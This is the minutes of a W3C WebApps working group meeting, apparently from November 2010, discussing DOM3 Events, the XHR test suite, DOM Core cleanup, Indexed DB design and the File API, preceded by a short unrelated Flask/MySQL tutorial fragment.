functionality. from dbconnect import connection ... @app.route('/register/', methods=["GET","POST"]) def register_page(): try: c, conn = connection() return("okay") except Exception as e: return(str(e)) We allow for GET and POST, but aren't handling it just yet. We're going to just try to run the imported connection function, which returns c and conn (cursor and connection objects). If the connection is successful, we just have the page say okay, otherwise it will output the error. Next up, let's build our register page.
https://pythonprogramming.net/flask-connect-mysql-using-mysqldb-tutorial/
CC-MAIN-2019-26
refinedweb
608
74.19
Relegate some posts to notes 5 files changed, 3 insertions(+), 43 deletions(-) D content/java-after-17-years/contents.lr R content/{asus-zenbook-ux303la-2014-review/contents.lr => notes/notes-on-asus-zenbook-ux303la-2014/contents.lr} R content/{review-of-lg-q-stylus/contents.lr => notes/notes-on-lg-q-stylus/contents.lr} R content/{rms-score/contents.lr => notes/rms-score/contents.lr} D content/tags/java/contents.lr D content/java-after-17-years/contents.lr => content/java-after-17-years/contents.lr -31 @@ 1,31 0,0 @@ title: Java after 17 years --- body: After seventeen years, I have run my first Java program all over again. Here it is in all its glory. ``` package com.company; public class Main { public static void main(String[] args) { System.out.println(String.format("Add %s to CV. ✔", "Java")); } } ``` Output: ``` Add Java to CV. ✔ ``` I submit this as a contender for the next Hello, World! --- pub_date: 2020-09-20 --- subtitle: hello world --- tags: java R content/asus-zenbook-ux303la-2014-review/contents.lr => content/notes/notes-on-asus-zenbook-ux303la-2014/contents.lr -3 @@ 1,4 1,4 @@ title: Asus Zenbook UX303LA 2014 Review title: Notes on Asus Zenbook UX303LA 2014 --- body: @@ 77,8 77,6 @@ I found 100s, if not 1000s, of users who had the exact same issue after the exac You will not go that wrong with Dell or Thinkpad if your budget is above $600. My personal recommendation is either the T or the X series of the Thinkpad line.</p> --- tags: review --- pub_date: 2015-01-25 --- last_updated_date: 2015-08-14 R content/review-of-lg-q-stylus/contents.lr => content/notes/notes-on-lg-q-stylus/contents.lr -4 @@ 1,8 1,6 @@ title: Review of LG Q Stylus+ Android phone title: Notes on LG Q Stylus+ Android phone --- tags: review --- metadesc: Review of LG Q Stylus+ Android phone metadesc: Notes on LG Q Stylus+ Android phone --- pub_date: 2019-02-14 --- R content/rms-score/contents.lr => content/notes/rms-score/contents.lr -2 @@ 18,6 18,4 @@ I got: > 12 non-free packages, 1.0% of 1147 installed packages. > 4 contrib packages, 0.3% of 1147 installed packages. --- tags: linux --- pub_date: 2012-04-15 D content/tags/java/contents.lr => content/tags/java/contents.lr -3
https://git.sr.ht/~animesh/anmsh.net/commit/73621677356d6861000fac93868a4a49c516af1d
CC-MAIN-2022-40
refinedweb
383
51.75
See also: IRC log <Barstow> ScribeNick: MikeSmith <Barstow> Scribe: Mike_Smith <Barstow> Date: 2 November 2010 <scribe> scribe: MikeSmith <shepazu> <shepazu> shepazu: first is to our tracker page … does not have every issue … because CLOSED issues don't show up … this reprepsents most of our LC technical comment … we figured we might have to go through LC gain … we will be adding the locale string … as we discussed yesterday … we will be making small changes … improving wording … editorial explanations … going to LC again in Jan … this time "for reals" <scribe> … pending any upheavals … doesn't specifcy evvery possible thing … we had a comment from Garrett Smith … also from Ample SDK anne: Sergei Ilinsky shepazu: wansts to modularize … and Anne wants to modularize more too shepazu: introduces all the things that were in DOM2 events … plues text input, keyboard input, one mutation event … though we have deprecated all the other mutation events shepazu: I think we are more or less fr … feature complete anne: I'm the editor of DOM Core … I think it make sense for DOM Core to define mutation events anne: simiilar to how we define Form events inside the Forms spec shepazu: we removed some Form-related events and those were moved to the Forms spec mjs: How about making mutation events die in a fire? ... I agree if they have really tight coupling to DOM behavior, it makes sense to have them in the same place … but tehre are some cases that don't require tight coupling at all weinig: some of our chagnes are pending that they don7t break major editing sites … or goal is to turn it on and see what sites break anne: smaug_: I don't understand why were are moving mutation events … I thought everybody just wanted them removed mjs: I thikn the DOM events mechanism really has become part of the core smaug_: yeah, but some specs may refere DOM events, but don't need to use DOM core mjs: there is almost no way to use DOM events without also using DOM core anne: what is an example where it's that case that something relies on DOM events but not DOM core smaug_: some specs just extend [by adding new events and so don't need to reference DOM core] shepazu: anne, please explain what you want to move, specifically <mjs> anne: there is a part call "Basic Event Interfaces" … it would make sense to split that part out shepazu: that is the core of DOM3 Events… anne: in addition to that, I think the mutation events should move too mjs: smaug, I think your dependency argument doesn't work [because the dependencies are complex] anne: this is implementable in Java <mjs> what I said about dependencies is that DOM3 Events has a normative dependency on DOM 3 Core <mjs> so there's no such thing as depending on DOM Events without depending on DOM Core Art: anybody else have comments? adrianba: I don't have a strong opinion about where we go in the long term … there is plenty of time to talk about it … right now there is an Event spec … which is what we are targeting in IE9 … it seems like the wrong time now to start cutting up the problem space in a different way … let's move the spec forward as it is adrianba: we are chartered to work in a new async spec for [something like mutation events] ... stabilizing what we how now and moving forward seems like the right thing mjs: my preference would be to move forward but plan [to move things to DOM Core later] smaug_: I agree … let's get DOM3 Events done now … DOM Core will take years adrianba: we have implemented some of the mutatation events … we all understand the problems with mutation events anne: I am afraid we are getting stuck with mutation events adrianba: we are kind of stuck with them anyway shepazu: if you are going to do part of it, it should all be in one spec anne: what do you mean by all? ... I don't think mouse events belongs together with it shepazu: I would agree that we should move DOM3 Events forward as it stands anne: I don't think labeling them as deprecated helps us all that much mjs: if the number of implementations is increasing, then [clearly it's not helping] anne: making them async would be a big start smaug_: we don't know that that will work ... tehre are some other approaches that are not event-based ... it is possible to remove some features from the platform … it has been done shepazu: deprecation is a warning to authors ... it's not helpful to remove them from the spec at this point weinig: if they were removed from DOM3 Events, would MSFT consider not adding them in IE9 [adrian shakes his head] shepazu: they are only supporting some of them adrianba: we are supporting them for interoperability reasons shepazu: they are in the spec because implementors asked for them to be in the spec art: I noticed big list of issues shepazu: a bunch of them are from David Flanagan [book author shepazu: Oli, Travis, Jacob Rossi, myself discussed them … we have agreed already to accept most of the comments … and have heard no objections from the list shepazu: event.timestamp is one that we have still be discussing art: can you do all 50 0f these by the end of the year? shepazu: we can round-trip on these by end of January ... if nobody has more comments, let's move on art: we don't have our next topic scheduled until 11am shepazu: a lot of people have said why don't specify the console object weinig: we just copied the console api into Webkit mjs: there are a few things around console that are Web-compatibility issues ... having to do with devs using console calls into their scripts even after they have done debugging weinig: there are a couple problems ... we don't think operations on the console should be visible to Web pages … we made some mistakes around that mjs: the fact that console.log exists and doesn't have potentially -> Console API adrianba: we having implemented the console in IE8-IE9 ... there is a session tomorrow to discuss a new community-driven spec-dev approah … this might be a good case to use as a pilot … for that approach shepazu: about 6 months ago, we got in contact with some devs who were working on an api from programatically writing and reading audio streams … and we started in Incubator Group … XG <Barstow> Audio XG Charter: shepazu: and right now, Mozilla has a related API they have have developed … and Googl Chrome team has a related API as well shepazu: and we have decided to start a new WG <Barstow> Audio XG's mail list archive: <Barstow> Mike: Chrome team is working on this API <Barstow> ... think we want broader participation shepazu: we would probably start the WG by February or so Barstow: we will be back at 11am with anne at the podium ... XHR1 test suite, and XHR1 issues [we take a 1 hour break: <anne> <ArtB> ACTION: barstow ask Doug for a pointer to Google's "Before Input Proposal" [recorded in] <trackbot> Created ACTION-608 - Ask Doug for a pointer to Google's "Before Input Proposal" [on Arthur Barstow - due 2010-11-09]. <ArtB> issue-119? <trackbot> ISSUE-119 -- Consider adding input/keyboard locale to text and keyboard events -- open <trackbot> <Barstow> ScribeNick: timeless_mbp <timeless> ScribeNick: timeless Scribe+ timeless ArtB: Anne will be talking about XHR Level 1 Test Suite <anne> and … and Level 1 issues anne: XHR Level 1 went to CR … which means it's awaiting implementations … of course XHR has been implemented long ago already … there is a test suite which has been announced on the list … but there has been little response … Since people are here now, I guess I can ask people directly sicking: I haven't looked at the testsuite yet, but is it fully automated? anne: you need a test harness, but it is automatic loaded a test says PASS/FAIL sicking: i think one of our desires is that things be as automated as possible anne: I agree <anne> … ? there is a testharness that it's written for which is used for other testsuites from this group [ anne describes how individual tests are structured ] adrianba: how much has the test suite changed recently? anne: the framework changed to make it the same as the HTML WG … quite a few changed because a number weren't matching the spec anymore … the old testsuite was quite outdated … some tests have been removed … the number of tests has gone down. because some test assertions were combined into single test dom: did you follow any specific method to ensure every feature has been tested? anne: um, no … i tried reading carefully to ensure everything is covered artb: do you think anything is missing? anne: there's an open item in the issue database about credentials in urls … the tests around that and authentication are not done yet <dom> (should known bugs in the test suite be documented somewhere?) <timeless_mbp> bryan: did you want to test posts? <timeless_mbp> … for redirects (?) <timeless_mbp> anne: i didn't want to because HTTP Biz is still undecided on some of this <timeless_mbp> … 301/302/307 ... <timeless_mbp> sicking: another thing is that Mozilla + Opera include dialogs on 307 <timeless_mbp> … it's sort of a requirement in the HTTP spec <timeless_mbp> … but they don't have it for direct address <timeless_mbp> … they're ratholes, so not tested yet, once they're resolved they'll be tested <timeless_mbp> anne: the only accessible methods are GET and POST <timeless_mbp> sam: didn't hixie add DELETE? <timeless_mbp> anne: we got him to remove it <timeless_mbp> anne: Trailers aren't tested yet, because i didn't know about them or how to test them <timeless_mbp> sicking: so do we have to test them? <timeless_mbp> anne: i might be able to test things w/ nph- <timeless_mbp> … but i'm not sure what to expect <timeless_mbp> sicking: trailers are after the response body <timeless_mbp> anne: so i guess the text that talks about the response body would have to talk about changing the state <timeless_mbp> … as far as i'm concerned, we don't need to support it <timeless_mbp> … for readyState changes <timeless_mbp> … but do you go to the done state <timeless_mbp> sam: you said the php scripts are available in an svn server? <timeless_mbp> anne: yeah, it was the second link i posted <dom> <timeless_mbp> artb: i assume the action then is for everyone to help this spec reach the exit criteria <timeless_mbp> … is to review the tests <timeless_mbp> anne: i assume there are some spec/test items which need fixing <timeless_mbp> … there's one other small test which might need fixing <timeless_mbp> … Björn Herman <timeless_mbp> … pointed out byte order mark character <shepazu> s/Byorn Herman/Björn Höhrmann/ <timeless_mbp> artb: we had set expectations that we wouldn't exit CR before Feb 2011 <timeless_mbp> sicking: which is two conforming implementations? <timeless_mbp> anne: I don't think that's likely to happen <timeless_mbp> … I would encourage people to review the editor's draft instead of this <timeless_mbp> … because there have been some changes to make this closer to XHR2 <timeless_mbp> … removing some throw conditions to enable CORS <timeless_mbp> … those have been reflected in the testsuite already <timeless_mbp> … i try to keep the testsuite and the draft in sync <timeless_mbp> … that also means that if you implement to the testsuite, there shouldn't be any conflicts with XHR2 <timeless_mbp> … if there are, that would be a bug <timeless_mbp> anne: i'm not sure if we want to discuss any of the issues now <timeless_mbp> artb: that's up to you, we have some of the people in the room <timeless_mbp> anne: one of them is the user info protection in the urls <timeless_mbp> … i think microsoft doesn't implement it <timeless_mbp> … and i think the other vendors do <timeless_mbp> … so that you can have... <timeless_mbp> anne: I think the HTTP people want to remove it <timeless_mbp> sicking: I think we could try to remove it <timeless_mbp> sicking: does the spec say they must be supported? <timeless_mbp> anne: the http url spec does mention them <timeless_mbp> anne: does the url get sent to the server? <timeless_mbp> sicking: it might leak in the form of a referer header <shepazu> scribenick: timeless sicking: i'm sure the url testsuite ... anne: they are mentioned in the spec … the spec has user and password arguments … which are used to set authorization headers (?) … if we don't remove it ... anne: there is an issue in the bug database, i think it's the only open issue at this point <Zakim> shepazu, you wanted to describe policy on php in test suites shepazu: so dom followed up with the Systems Team on PHP tests … we just got confirmation that we will be hosting the php tests <Barstow> ACTION: barstow XHR: add link to bugzilla in PubStatus [recorded in] <trackbot> Created ACTION-609 - XHR: add link to bugzilla in PubStatus [on Arthur Barstow - due 2010-11-09]. … any tests that involves PHP will require review by the Systems Team … they will be hosted on the load balancing servers anne: which servers? dom: they'll be hosted on test.w3.org ... it would be helpful if you moved to the mercurial server anne: i think there's a version there … but probably not up to date shepazu: the process will be such that you let us know when there's a specific version you want deployed … it will not be deployed until the systems team reviews it shepazu: i think this will come up a lot anne: there's also the web sockets stuff dom: i think that is more complicated and will require more work … i think we can manage, it requires more work shepazu: for cross domain work, i think we'll need another domain adrianba: we already have "test" and "test2" which are cnames dom: if you are working on any test suite that has server side things, please get in touch with the Systems Team early anne: if you really want to test the really gritty networking stuff … I think you will need HTTPS, certificates, DV, EV, OV,... shepazu: those are good points … Philippe is starting a new testing project … so setting up a little test honey pot might be possible dom: in general i think what's important is getting things to the REC track, so get in touch with Systems Team earlier rather than later <scribe> ScribeNick: timeless artb: anything else about XHR or its testsuite? anne: no. apart from asking people to review/give comments bryan: is it easy to set up? anne: yes, there's a readme <dom> (can we record an action to update the test suite on dvcs.w3.org?) artb: based on the feedback you've got so far on the XHR1 candidate Action anne update the test suite on dvcs.w3.org <trackbot> Created ACTION-610 - Update the test suite on dvcs.w3.org [on Anne van Kesteren - due 2010-11-09]. anne: Before going back to last call ... make sure that we have two implementations that pass all the tests ... and that the specification has all the implementations passed that ... so that when we go back to LC we can go to PR after that (skipping CR) artb: the third bullet for this hour is a general discussion about testing ... and we've already gone down that path quite a bit anne: we could discuss responseArrayBuffer briefly ... i'm not sure we could reach a conclusion now sicking: I do have something to say on this ... So, the complicated issue is that... ... there's multiple topics ... the whole ongoing discussion right now about parsing... ... all requests into all response properties ... (Boris Z) ... what i'd like to do is move away from the current situation ... where we parse into multiple properties ... which is the XHR1 behavior ... I want to move to a way where you specify up front which thing you want adrianba: I think that makes sense ... so if you know it's coming as JSON or you want it as a Blob, you can specify that sicking: obviously we need to retain compatibility with XHR1 ... and the stuff where you get a document anne: this sounds kind of annoying sicking: while it is nice to have things nice to have things parsed into everything ... it's only nice if you don't have to consider all the resources used ... what we're talking about is Document anne: but you only need to create Document once it's requested ... you don't have to do it all up front sicking: in our implementation ... we'll do charset-decoding differently depending on whether we're parsing into a document or not ... so responseText changes depending on whether you have a document ... and the spec requires this ... everything else, JSON, Blobs, streams... anne: streams? sicking: we'll end up having to do it adrianba: streams for media... sicking: you can't set headers without this adrianba: or you might want to process the data as it arrives [anne was asking about using <video> ] sam: we don't have to convince anne about streams ... more things will be using new content formats geoffrey: there will be more and more kinds with time anne: this screws with content negotation [ scribe laughs ] sicking: one of the aspects of my proposal is that you can set .responseType after headers are received ... but before any data has been processed anne: how would it work for sync requests/ sicking: we'd fire events anne: but they're blocked by the sync request sicking: you can't fire an async request, but you can fire a sync event ... that's trivial implementation-wise ... you just run code on the main thread anne: that sounds hairy smaug: we explicitly want to get rid of ready state change events ... because that causes hanging in safari adrianba: i think it's fine to not support sync requests for this new feature ... because we want to push people toward async jonas+sam: for workers sync requests are fine anne: i'm saying you're opening a rathole mjs: so what are we specifically talking about? geoffrey: this was for when we receive content headers anne: i don't think we should really fire events during a sync request ... because conceptually that's confusing/seems really weird mjs: there's generally a separate thread buffering the data from the network sam: the buffering is already happening ... anyone doing network handling on the main thread is probably doing something really wrong anyway sicking: i'm suggesting this *only* for workers anne: I guess I would have to reference Workers from XHR2 sam: we kind of think of sync as deprecated in the main context now ... so adding features and having them exposed for the non workers case is kind of like whatever mjs: even in workers, i think it makes sense to encourage people to have multiple concurrent requests ... by not providing this feature for sync sicking: i'm not sure that this has taken off artb: time check ... we have test suites we've already covered ... and you have ... sicking: i posted my original proposal on content negotiation to the list ... it's a long thread ... i had one more issue on byte array ... have you seen the proposal on the ecma list ... about another binary format? anne: i'm not on the list ... i think it should align with webgl <MikeSmith> sicking, url? sicking: it's a long discussion ... i'll try to find the url anne: i don't mind removing endianness ... but it would have to be aligned about webgl sam: the reason for the endianness is that you want things in host byte order for webgl sicking: not all details are worked out yet ... the idea is to have it be fast ... but without exposing platform endianness ... the problem is that you're talking between two languages, JS and GLSL ... david herman is the guy who made the proposal <anne> GLSL = OpenGL Shading Language <sicking> <sicking> <sicking> artb: before we go on to DOM Core, I wanted to set aside a few minutes for testing <Guest724> anne , t'es fran�aise ?! adrianba: we submitted tests for the webapps and html WGs <adrianba> adrianba: i'd like to move away from a system where we have a different process per spec for submission ... we have some tests which we have committed to the mercurial repository - i just pasted the link ... when I was talking to doug, he was trying to develop tests alongside the spec ... we/he found that if you develop tests as you develop the spec, it's easier to find spec issues ... there's a question of where to put tests as things are developed ... and keep aware of which things are agreed upon tests. which are under development. which aren't agreed sicking: we should try to require tests to be automatically runnable <Barstow> ACTION: barstow work with Team and Chaals on formalizing test suite process for WebApps [recorded in] <trackbot> Created ACTION-611 - Work with Team and Chaals on formalizing test suite process for WebApps [on Arthur Barstow - due 2010-11-09]. anne: ... whenever possible adrianba: i think the work that anne did to refactor the XHR test suite to use the same framework as the HTML tests ... he should receive credit for that, because it made things much easier to review sicking: when mozilla started adding tests to a framework ... it made things much better ... So if we have a formalized framework, and we should pick one, and force everyone [in the webapps WG] to use that one artb: for new tests... shepazu: certainly most of the tests around browser stuff should use the same framework ... there's probably some stuff in W3C outside of browser context where this doesn't make sense ... the SVG group has also agreed to move to the same framework ... with SVG2, things are not going to go into the spec without having tests added ... until we do that, we'll mark things as under review ... I guess i'm just offering a +1 for a common framework as much as possible ... have we talked about testing with WebIDL? ... because if you describe stuff in a spec with webidl, you're going to be able to extract that and do a certain amount of automated tests ... or not? sicking: i'm more of a fan of handwritten tests ... i'll believe it when i see it dom: there was a perl tool that i mentioned on public-script-coord ... ... that generated tests from idl ... But I agree with jonas that it's better to start with manual tests adrianba: the model that creating things is that you can use automatic creation to simplify basic generation of simpler tests to supplement hand-written tests sicking: at mozilla we're also looking into automatically testing things that aren't automatically testable ... such as testing interacting with a file picker ... things which require apis which aren't web accessible AnssiK: about functional testing... do you have things other than unit testing? sicking: what we do is that we expose a lot of stuff to javascript ... to have javascript override the dialog ... we can also fake real clicks on things ... it's being rewritten because the way we did it is not good <dom> perl tool to generate test cases based on WebIDL AnssiK: there's a thing called sellenium [ ] scribe: which is cross browser <AnssiK> s/sellenium/Selenium/ sicking: we're using a somewhat different approach shepazu: when i tried to do test first / test in parallel ... i unfortunately failed ... i couldn't get the resources together in order to do that <adam> Selenium can be automated using something like Hudson shepazu: do people find testing in parallel to develop tests at the same time as developing the spec David: with WAC we made sure that there are Test Assertions as you write the spec <dom> A Method for Writing Testable Conformance Requirements David: the outcome of what you want can be written out as the spec is written ... you have a test description file that links back to the spec shepazu: is there interest in imposing this on the WG? artb: yes, I took an action to work this out ... we'd put forward a proposal to the WG ... no one objected adrianba: i volunteered testing resources david: we strongly support any work in testing <adrianba> s/i volunteered testing resources/i volunteer to help define the process proposal/ david: we've had complaints in WAC, the other stuff has been quite difficult for us to test (for lack of tests) anne: DOM Level 3 Core was a REC a long time ago ... there's various differences in what web browsers implemented and what the spec says [ anne describes differences ] <Barstow> ArtB: Web DOM Core abstract: anne: there are a few things HTML5 currently defines, which I think should be moved back to DOM Core ... like what createElement does <shepazu> [here's a short analysis of a case of WRONG_DOCUMENT_ERR: ] anne: and defining what Document.charset/Document.defaultCharset/... are. ... but leaving HTML to define when it sets them ... there's a more ambitious goal of getting rid of AttrNodes [ sicking talks about DOM UserData] sicking: i'm surprised no one has got requests for them sam: we have ... but in the past we've said can't you use set property? ... and that's been good enough for them sicking: but you could get conflicts with future specs ... yeah i'm all for getting rid of AttrNodes ... i was talking to travis from Microsoft about it ... we might need to add ownerElement on the Attr ... the main goal is to make them not be nodes anne: this would move the namespaceURI away from Node sicking: attribute nodes, i know we keep having security issues with anne: the other things, it would be nice to get rid of, but it isn't terribly important ... namespaceURI is only relevant for Element and Attr sicking: it's useful for simple traversal anne: the main reason is to avoid casting in Java sicking: forms does the same thing, so you can iterate the forms.elements array ... so you can avoid checking the type before getting properties anne: but what would you be doing? sicking: ...i don't know... artb: so, this afternoon will be IndexDB, chaired by Anne sicking: is anyone else planning to try to start removing these things? anne: we don't want to lead sam: webkit would be interested in trying in nightlies anne: we have already removed DOM UserData by not implementing it sam: I have done the same for years, by not implementing it anne: we are not actively removing things, but we have tried to restrain ourselves from implementing things ... we would really like the Attr thing sam: Are there any NodeLists that return Nodes other than Elements? anne: there were. but I tried to kill those ... maybe there are no longer Break for Lunch <anne> arun, you there? <anne> arun, you want to dial in for Indexed DB? <MikeSmith> arun: you got a Skype ID? <arun> Hi there Mike <MikeSmith> hey man <arun> MikeSmith: I'd like to dialin if possible. <arun> anne: I'd like to dial in if possible. <MikeSmith> scribe: MikeSmith <adam> Adam Boyet - Boeing Paulo: there is a list of topics on the mailing list <anne> <adrianba> s/Paulo/Pablo/ pablo: shall we do Keys? ... keys and tables… what we have today is simple keys … compound keys, custom orders <anne> Indexed DB: …e.g., by date + by integer … key value would be an array sicking: not sure what syntax we should use sicking: one proposal was array of "key paths" jorlow: compound keys, being able to have arrays in your keys; another thing is compound indexes pablo: can't we reduce that to the same problem? jorlow: one or part of the structure of the DB, one is something you can do more ad hoc … key could be array one time, a string or something else the next <anne> who is +1.408.446.aabb? Nikunj? <Nikunj> Nikunj <anne> kk <anne> screw you Zakim pablo: rule of strictly sorting by type, then sort by value is very sharp jorlow: another question is, what do we want to do if you ahve a key path to "foo" and you insert an item that doesn't include a "foo" [discussion about what to do if a key path resolves to an array] sicking: every place where we currently allow values we should also allows arrays [discussion about difficulty of implementing] [sicking demonstrates with some code] Option A is an array is just a single value s/Option A/pablo: Option A/ jorlow: example is that people can have multiple names, and you can construct an index such that multiple names map to the same person pablo: I am not sure about composite keys made of arrays sicking: the 2nd case is multiple records pointing to the same object store <Nikunj> I thought that composite key means there are many parts to a key and that the parts are obtained from different paths <Nikunj> The discussion seems to be about a single path resolving to multiple values sicking, see Nikunj comment sicking: Nikunj, I agree with your interpretation jorlow: yeah, agreed ... what are we going to do in teh case where you are inserting a value that doesn't include something for a key path e.g., you are inserting a person and you don't include a first name, and the first name is the key <Nikunj> Multiple keys in an index pointing to a single object is not the same use case as compound key jorlow: pablo, you seem to be worried that any handling of arrays is going to be a lot of work <Nikunj> The latter is about constructing a key serialization from multiple keypaths <Nikunj> The former changes the meaning of a key <Nikunj> there is a difference between composite and compound keys <Nikunj> See sicking: in solution A we can have a mix of values and arrays. jorlow: should be allow keys to be indexes? ... the only use case is, search on multiple keys ... use case 1 is, my DB has people in it, with first name and last name … and I want to search for everybody who has both a certain first name and a certain last name jorlow: use case 2 is @@something @@ ... 3rd possibility is first-name entry, last-name entry, then an entry that has both that duplicates the first two <jorlow> jorlow: choice is, do you want users to have to duplicate their data? or do you want to have duplicated indexes s/@@something @@/database contains people, find person with name "foo", be that first or last name/ anne: so there's no AND ? jorlow: there's no query language Nikunj: I am not sure you need composite keys nor compound keys jorlow: specifying a join language is a very big task … for that, you can take whatever we've done so far here and multiply it by 100 Nikunj: I am looking for a join _primitive_ pablo: scenario is, you expect sort order to be in accord with your language <Nikunj> See for a description of the join primitive sicking: question is, are we happy with having a language on a DB-wide basis? [as opposed to per object store] <anne> jorlow: my vote is, don't do it <Nikunj> What is the current topic? <anne> Transactions <anne> ... all transactions have time-consistency <anne> ... how implementations achieve that is up to the implementation <anne> ... for writers you can only have one writer happening at the time <anne> ... unless they are separate object stores/tables <anne> ... you could figure out the overlap and be very smart... whatever (something like that) <anne> ... should be some more non-normative text that explains this <anne> JS: if you start two transactions; is there any guarantee with respect to order? <anne> JO: I don't think so; get weird behavior with locking; would be shame as we get less concurrency <anne> JS: what if there is overlap <anne> JS: read, readrequest, write, writerequest <anne> JO: no order guaranteed <anne> JS: sounds very racy <anne> JO: if you cared do not start them at the same time <anne> Pablo: I don't think it is strictly a race <anne> JO: what is the use for starting them at the same time? <anne> Pablo: there should not be starvation <anne> JS: already says that <anne> JS: in Firefox there's no raceness and you always know the order <anne> JS: and no starvation either <anne> JO: I can't think of any reason you start these and expect them to run in the same order <anne> thank you darobin <anne> Pablo: workers also introduce these problems <anne> within one worker you can only have one transaction <anne> that assumes requiring locks is in order <anne> make minutes <mjs> ScribeNick weinig <weinig> js: you already have to lock tables <weinig> js: we have to make the transaction function take a callback <weinig> pablo: why can't we make the second transaction fail <weinig> js: it would be very confusing for two independent libraries to interact together <weinig> pablo: that syntax seems very unwieldily <weinig> jo: the function is just defining scope <weinig> js: transactions within the function will throw <weinig> jo: is anyone planning to implement sync <weinig> jo: should we have a warning in the spec? <weinig> jo: editors should try and keep sync and async in sync <weinig> pablo: is everyone planning on doing async in main context and sync and async in workers? <weinig> everyone: yes <Nikunj> can implementors provide an update on their implementation status/plans <weinig> pablo: should transactions be allowed in transactions? <weinig> jo: maybe we should have an open nested transaction <weinig> pablo: everything you would need to do you can do off the transaction <weinig> pablo: lets ignore the last few lines <anne> scribe: anne RESOLUTION: not automatically assign to Nikunj; MikeSmith to follow up We have room number 4 all day tomorrow times to be announced <MikeSmith> if the problem is that Nikunj is not in the tracker DB I can add him now Pablo: by default we are not going to let apps fill the disk; so what to do <MikeSmith> trackbot, status? Pablo: lots of degrees of freedom MikeSmith, it would be nice if it was assigned to a nobody instead since Nikunj is not the only editor <MikeSmith> hai <MikeSmith> I will change it now Pablo: bytes are not necessarily meaningful as a unit great Pablo: first attempt to use the database; anything the app needs to do? SQL DB estimated size argument was very confusing Dealing with size constraints: 1) no API impact Chrome has a hard limit (with a non-specced error) conclusion seems to be that some kind of quota error is needed the spec does not say you create the index asynchronously JO: i think it is implied Pablo: it should be explicit JO: i think it is in there, maybe should be more explained ... if it fails it fails the transaction Does there need to be a way for asking for more space? adrianba: in SilverLight we wanted to give the app more control ... if e.g. you download a huge file you do not want the UA to have to ask and ask again ... but instead allocate once JO: use cases are caching and some kind of permanent storage (i.e. offline written email) Pablo: impossible for us to decide s/permanent/persistent/ JO: in Chrome we plan to group APIs together ... if you get 10 MB you can use it for several APIs AvK: for the hint for the pre-allocation of memory case it should be a generic API if we are heading in that direction JO: for the persistant vs temporary case that should be noted on the object store ... maybe change createObjectStore (or something like that) to take this as parameter adrianba: how long do blobs persist? JS: tied to the Window object Eric: if you want to change a Blob you create a new one ... you cannot create a File at the moment ... a file has a last modified time and a name Pablo: I'm assuming when you store it in the DB it is a copy JS: I hope Indexed DB to be enough ... not need a File System ... I don't want File System to have a capability that Indexed DB does not which is that you can modify a file that is stored (if the scribe gets it correctly) [questions on this topic are best asked on the list] JO: should we set goals adrianba: address the existing issues JO: full text search is important ... not gonna be efficient with what we have now ... full text search is extremely important to Google <arun> Full text search was important to external developers as well. JO: I hope that one or two changes to the API can make this possible ... I want to get proof first, before adding something to the specification synchronizing... Pablo: some kind of tracking tombstones? [further discussion on list] arun, you still here? <arun> anne, yep cool I guess Jonas can go through the File API mostly might be tricky over the phone <arun> anne, it's cool. I can hear you guys really clearly <arun> anne, if I need to speak I'll just speak up. <arun> anne, you can refer to the email I sent about agenda stuff if you like. <arun> anne is the URL string trouble maker <jorlow> scribe: jorlow anne, doesn't like adding 2 more methods to window arun, any other solution is back to the drawing board anne, vendor prefixing might help limit usage anne, but we still need to find the right solution ericu, stuff put on the global object so that stuff is tied to the lifetime of the window jonas: when window is nagivated away, all urls are revoked sam: you can do that regaurless of the syntax ericu: what about if you pass from one window to another? this is more explicit sam, disagrees jonas, is fine with other suggestions. thinks reusing url is weird because it's only somewhat related sam, so you could just have a blobURI object jonas, an object might make sense....something about domURL anne, don't you want to stringify it as well? jonas, no jonas, you'd create an object from a string anne, you're still not solving the problem jonas, trying to solve 2 problmes jonas, something so we don't create strings...for that, need to create a new type of interface...call it domURL for now anne, domURL could be some union type of blob and stream jonas, don't want create to be through some constructor and revoke through a completely different api jonas: we coudl create a global dummy object with both methods arun: is it worth make global dummy object the same thing being specced by adam barth no jonas: abarth's thing is to solve parsing urls. this isn't want we need to do with blob urls anne: not so sure jonas: there's a vague resemblance given that they both revolve around URLs sam: agrees ... especially since adam's thing doens't exist yet ... can we discuss other things? jonas: the proposed solution is some global object where we put 2 functions anne: is there some existing place we could put them? sam: maybe window.blob? but you want to do it for stream too so maybe that's not a good place ericu and others: k, let's move on <timeless> s/coudl/could/ <timeless> s/doens't/doesn't/ sam: 2 questions. file list has been redefined to be a sequence of files rather than a simple object. our implementation has file lists like node lists. sequence doesn't have an item function. anne: cameron said sequence isn't for that type of thing jonas: saw hixie open a bug on something similar today sam: in the mean time, should we go back to the simple interface? anne: file lists should probably follow others general agreement sam: file reader + write have event handler attributes but don't inherit from event target. arun: it does sam: sees it...what about writer? ericu: if so, it's a bug anne: we should have some consistency sam: using implements probably makes sense (vs. inheriting) in the spec arun: agrees with sam anne: XHR inherits sam: in webkit, event target isn't in the prototype chain ... does it affect it though? anne: maybe xhr should change jonas: no advantage to not inheriting sam: let's avoid multiple inheritance jonas: agrees ... but most of these thigns don't inherit anne: XHR does jonas: but you can add it to the bottom of the chain <timeless> s/thigns/things/ sam: everything in svg uses multiple inheritance ... we should probably bring this up as a WebIDL issue jonas: it's unfortuate you can't add stuff to event target prototype sam: if we could solve multiple inheritance in a good way, then maybe it's a non-issue ... jonas, are you coming to tc39? jonas: yes anne: does it have anything more on file api? s/does it/do we/ <MikeSmith> s/Transactions/scribe: anne/ jonas: request from google...when you request url, wants to do something related to content type (didn't understand) i didn't understand <arun> arun: do we still have URL string dereferencing behavior? ericu: right now content type is a property of blob ... we could add these properties to blob directly arun: only contnet disposition was asked for ... just like content type <MikeSmith> i/What is the current topic/scribe: anne <timeless> s/contnet/content/ <MikeSmith> dunno jonas: darin fisher has asked for content disposition. jonas has said to use file save back to him ... and point the file saver to the blob directly ericu: we want blob url to work just like any other <arun> arun: right, so instead of Content-Disposition on Blob URLs, you have a URL argument to the FileSave constructor. ericu: gmail offline, for example, wants to be able to view and download with similar code. just different urls. presentation layer stays same, but backend just gives different urls sam: not sure he understands why you'd create a url from a blob and pass it to an XHR jonas: not sure anyone suggested this sam: isn't that the reason to set headers: to get it through XHR? jonas: no, it was just to explain ... iframes care about headers ... to do gmail file saving, create iframe, take blob, create url, content dis. header, iframe looks at that header, it works ericu: can't you do that today? ... only need iframe trick if you don't have content disposition header ... wait...hm... jonas: link with target: _blank sam: that opens a window anne: behavior varries sam: agreed ... very marginal use case jonas: it's a very roundabout way of triggering file save dialog <arun> arun: +1 to sam, sicking ericu: urls have these properties already ... making offline urls work just like online urls seems nice sam: they're more a property of the resource, not the url itself 